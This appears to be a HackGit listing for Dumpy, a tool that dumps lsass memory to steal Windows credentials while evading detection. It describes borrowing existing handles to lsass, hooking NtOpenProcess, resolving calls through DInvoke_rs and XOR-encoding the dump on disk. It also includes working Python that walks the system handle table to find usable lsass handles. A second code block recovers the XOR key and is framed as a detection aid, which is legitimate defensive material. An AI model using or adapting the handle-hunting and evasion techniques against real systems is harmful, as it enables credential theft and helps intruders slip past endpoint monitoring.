
Dumpy | HackGit

Dumpy

This tool dynamically calls MiniDumpWriteDump to dump the memory of lsass. It does so without opening a new process handle to lsass, and it resolves and calls the functions it needs through DInvoke_rs, which makes the malicious behaviour harder to detect.

To obtain a usable process handle without calling OpenProcess on lsass, every handle in the system is inspected: the system handle table is read with NtQuerySystemInformation, each candidate handle is duplicated into the current process with NtDuplicateObject, NtQueryObject confirms that it refers to a Process object, and QueryFullProcessImageNameW confirms that the process is lsass.exe. A borrowed handle is only useful if it was granted at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ, the rights MiniDumpWriteDump needs, and duplicating it requires PROCESS_DUP_HANDLE access on the process that owns it.

NtOpenProcess is hooked before MiniDumpWriteDump is called, so that the dump routine's own attempt to open the target does not create a new process handle to lsass; the borrowed handle stays the only one this process ever holds.
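The handle-hunting step above, as an added example that is not code from the Dumpy project: it parses the raw buffer returned by NtQuerySystemInformation(SystemHandleInformation) for both the x86 and x64 layouts and keeps only the entries worth duplicating, i.e. process handles owned by other processes whose granted access covers what MiniDumpWriteDump needs. The example assumes the classic SystemHandleInformation class (16) with 16-bit PIDs (Dumpy may use the extended class), an assumed "Process" type index of 7 and a constructed sample table; the NtQueryObject and QueryFullProcessImageNameW checks on the duplicated handle are described in comments but not performed, since they cannot run offline.

```python
import struct

# Rights MiniDumpWriteDump needs on the target handle. A handle granted only
# PROCESS_QUERY_LIMITED_INFORMATION (0x1000) still points at lsass, but the
# dump call fails with it.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
REQUIRED_ACCESS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
SYSTEM_HANDLE_INFORMATION = 16  # SYSTEM_INFORMATION_CLASS value for the handle table

# NtQuerySystemInformation(SystemHandleInformation) returns a ULONG
# NumberOfHandles followed by an array of SYSTEM_HANDLE_TABLE_ENTRY_INFO:
#   USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex;
#   UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess;
# The pointer-sized Object field changes both the entry size and the
# alignment of the array, which is why x86 and x64 need different layouts.
LAYOUT = {
    "x64": ("<I4x", "<HHBBHQI4x"),  # 8-byte header, 24-byte entries
    "x86": ("<I",   "<HHBBHII"),    # 4-byte header, 16-byte entries
}


def entry_size(arch: str) -> int:
    return struct.calcsize(LAYOUT[arch][1])


def parse_handle_table(buf: bytes, arch: str = "x64"):
    """Yield one dict per entry of a raw SystemHandleInformation buffer."""
    hdr_fmt, ent_fmt = LAYOUT[arch]
    (count,) = struct.unpack_from(hdr_fmt, buf, 0)
    base, size = struct.calcsize(hdr_fmt), struct.calcsize(ent_fmt)
    for i in range(count):
        pid, _bt, type_idx, attrs, hval, obj, access = struct.unpack_from(ent_fmt, buf, base + i * size)
        yield {"pid": pid, "type_index": type_idx, "attributes": attrs,
               "handle": hval, "object": obj, "access": access}


def find_candidate_handles(buf: bytes, own_pid: int, process_type_index: int, arch: str = "x64"):
    """Return entries worth duplicating: process handles held by other
    processes with enough access for MiniDumpWriteDump.

    process_type_index is the ObjectTypeIndex of the "Process" type, which
    differs between Windows versions; on a live host read it from the entry
    of a handle you know is a process handle. Whether a candidate really
    refers to lsass is only known after NtDuplicateObject (needs
    PROCESS_DUP_HANDLE on the owner) and NtQueryObject /
    QueryFullProcessImageNameW on the duplicate; that step is not done here.
    """
    hits = []
    for e in parse_handle_table(buf, arch):
        if e["pid"] == own_pid or e["type_index"] != process_type_index:
            continue
        if (e["access"] & REQUIRED_ACCESS) != REQUIRED_ACCESS:
            continue
        hits.append(e)
    return hits


def query_live_handle_table() -> bytes:
    """Windows only: fetch the real table through ntdll!NtQuerySystemInformation,
    growing the buffer while the call returns STATUS_INFO_LENGTH_MISMATCH.
    Plain ctypes, not the DInvoke_rs-style resolution the tool uses."""
    import ctypes
    ntdll = ctypes.WinDLL("ntdll")
    size = 1 << 20
    while True:
        buf = ctypes.create_string_buffer(size)
        returned = ctypes.c_ulong(0)
        status = ntdll.NtQuerySystemInformation(
            SYSTEM_HANDLE_INFORMATION, buf, size, ctypes.byref(returned)) & 0xFFFFFFFF
        if status == 0:
            return buf.raw
        if status != 0xC0000004:  # STATUS_INFO_LENGTH_MISMATCH
            raise OSError(f"NtQuerySystemInformation failed: {status:#010x}")
        size *= 2


def build_handle_table(entries, arch: str = "x64") -> bytes:
    """Pack a constructed table for the offline demo (not captured from a host)."""
    hdr_fmt, ent_fmt = LAYOUT[arch]
    body = b"".join(struct.pack(ent_fmt, pid, 0, type_idx, 0, hval, obj, access)
                    for pid, type_idx, hval, obj, access in entries)
    return struct.pack(hdr_fmt, len(entries)) + body


# Constructed sample. 7 is an assumed "Process" type index; 0x8A1F2C00 stands
# in for the lsass EPROCESS address and fits both the 32- and 64-bit layouts.
PROCESS_TYPE_INDEX = 7
SAMPLE_ENTRIES = [
    # (owner pid, ObjectTypeIndex, HandleValue, Object, GrantedAccess)
    (4444, 7,  0x1A4, 0x8A1F2C00, 0x1FFFFF),  # PROCESS_ALL_ACCESS: candidate
    (4444, 28, 0x1A8, 0x8A1F3D00, 0x1FFFFF),  # not a Process object: skipped
    (1234, 7,  0x2B0, 0x8A1F2C00, 0x1000),    # QUERY_LIMITED_INFORMATION only: skipped
    (5678, 7,  0x0C8, 0x8A1F2C00, 0x0410),    # exactly VM_READ|QUERY_INFORMATION: candidate
    (9999, 7,  0x100, 0x8A1F2C00, 0x1FFFFF),  # held by our own process: skipped
]


def demo(arch: str = "x64"):
    table = build_handle_table(SAMPLE_ENTRIES, arch)
    hits = find_candidate_handles(table, own_pid=9999, process_type_index=PROCESS_TYPE_INDEX, arch=arch)
    return [(e["pid"], e["handle"]) for e in hits]


if __name__ == "__main__":
    print(demo("x64"))  # [(4444, 420), (5678, 200)]
```

Entries that share the same Object address are handles to the same kernel object, so once one duplicate has been identified as lsass the others need no further querying. The access-mask filter is what makes the difference in practice: many processes hold limited-information handles to lsass, and only the ones with PROCESS_VM_READ are worth the NtDuplicateObject call, which itself shows up as a cross-process handle duplication to anyone watching.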

NTFS transactions are used to XOR-encode the memory dump before it is stored on disk, so the file that lands on disk is not a plaintext minidump.
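XOR-encoding the dump hides the well-known minidump header from file scanners, but it is not encryption. As an added example that is not part of Dumpy and does not know Dumpy's actual key format, the following recovers a short repeating XOR key from an encoded dump by known plaintext: every minidump starts with the signature "MDMP" and the version word 0xA793, and the rest of the MINIDUMP_HEADER must then decode to sane values. The sample dump is constructed inline and the key is chosen for the example; the NTFS transaction part of the write is not reproduced.

```python
import struct

MDMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793  # low word of MINIDUMP_HEADER.Version; high word is implementation-specific
KNOWN_PREFIX = MDMP_SIGNATURE + struct.pack("<H", MINIDUMP_VERSION)  # 6 bytes of known plaintext
# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (32 bytes in total)
HEADER_FMT = "<4sIIIIIQ"
HEADER_SIZE = struct.calcsize(HEADER_FMT)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    k = len(key)
    return bytes(b ^ key[i % k] for i, b in enumerate(data))


def parse_header(data: bytes) -> dict:
    sig, version, nstreams, dir_rva, checksum, timestamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    return {"signature": sig, "version": version & 0xFFFF, "streams": nstreams,
            "directory_rva": dir_rva, "checksum": checksum, "timestamp": timestamp, "flags": flags}


def header_is_plausible(header: bytes, total_len: int) -> bool:
    """Sanity check that rejects accidental matches on the 6 known bytes:
    a real dump has a small stream count and a directory inside the file."""
    if len(header) < HEADER_SIZE:
        return False
    h = parse_header(header)
    return (h["signature"] == MDMP_SIGNATURE and h["version"] == MINIDUMP_VERSION
            and 1 <= h["streams"] <= 64 and HEADER_SIZE <= h["directory_rva"] < total_len)


def recover_xor_key(blob: bytes, max_key_len: int = 6):
    """Known-plaintext attack: return the shortest repeating key (at most
    max_key_len bytes, capped at the 6 known bytes) under which the blob
    decodes to a plausible MINIDUMP_HEADER, or None if nothing fits."""
    if len(blob) < HEADER_SIZE:
        return None
    keystream = bytes(c ^ p for c, p in zip(blob, KNOWN_PREFIX))
    for n in range(1, min(max_key_len, len(KNOWN_PREFIX)) + 1):
        key = keystream[:n]
        if any(keystream[i] != key[i % n] for i in range(len(KNOWN_PREFIX))):
            continue
        if header_is_plausible(xor_bytes(blob[:HEADER_SIZE], key), len(blob)):
            return key
    return None


def build_sample_dump() -> bytes:
    """Constructed stand-in for a minidump: a valid header, three empty
    MINIDUMP_DIRECTORY entries (12 bytes each) and filler. Not a real dump."""
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0x1234A793, 3, HEADER_SIZE, 0, 0x65432100, 0)
    directory = bytes(12 * 3)
    return header + directory + b"filler-memory-content" * 4


SAMPLE_KEY = b"\x5a\xc3\x17"  # assumed key, chosen for the example


def demo():
    on_disk = xor_bytes(build_sample_dump(), SAMPLE_KEY)  # what an XOR-before-write tool would store
    key = recover_xor_key(on_disk)
    recovered = xor_bytes(on_disk, key) if key else None
    return key, recovered


if __name__ == "__main__":
    key, recovered = demo()
    print(key, parse_header(recovered)["streams"])
```

With only six bytes of guaranteed plaintext a six-byte key cannot be checked against the prefix alone, which is why the header plausibility test is part of the recovery rather than an afterthought; longer keys need more known structure (for example the stream directory that normally follows the header) or a statistical attack. For defenders the useful side effect is the inverse: a file whose first bytes decode to "MDMP" under some short key is a strong indicator of an obfuscated credential dump.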

Both x86 and x64 are supported.

https://github.com/Kudaes/Dumpy

#lsass #dump